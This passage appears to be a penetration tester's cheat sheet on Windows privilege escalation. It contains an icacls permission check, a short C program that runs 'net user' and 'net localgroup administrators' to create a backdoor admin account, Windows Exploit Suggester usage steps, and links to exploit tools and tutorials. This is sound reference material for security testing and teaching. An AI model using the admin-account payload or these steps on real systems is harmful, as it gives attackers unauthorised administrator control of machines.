• Check File permissions via icacls and check if they might be writeable for everyone:icacls <filename>
  • C-Code to add a new user to the administrator group:#include <stdlib.h> /* system, NULL, EXIT_FAILURE */ // add new user to administrators group // compile with mingw32: // i586-mingw32msvc-gcc -o useradd_win useradd_win.c int main(){ int i; i=system ("net user <username> <password> /add"); i=system ("net localgroup administrators <username> /add"); return 0; }
  • Windows Exploit Suggester:
    • Get sysinfo from Windows:systeminfo > sys.info
    • Upload the sys.info file to your Linux machine
    • Update the Exploit Suggester:python windows-exploit-suggester.py -u
    • Execute it:python windows-exploit-suggester -d <databasefile> -i <sysinfofile>

Windows Privilege Escalation

  1. http://www.fuzzysecurity.com/tutorials/16.html
  2. https://toshellandback.com/2015/11/24/ms-priv-esc/
  3. https://github.com/pentestmonkey/windows-privesc-check
  4. https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
  5. https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  6. https://github.com/foxglovesec/RottenPotato
  7. http://www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet/
  8. https://www.youtube.com/watch?v=PC_iMqiuIRQ
  9. https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be
  10. https://github.com/PowerShellMafia/PowerSploit
  11. http://www.blackhillsinfosec.com/?p=5824
  12. https://www.commonexploits.com/unquoted-service-paths/
  13. https://github.com/abatchy17/WindowsExploits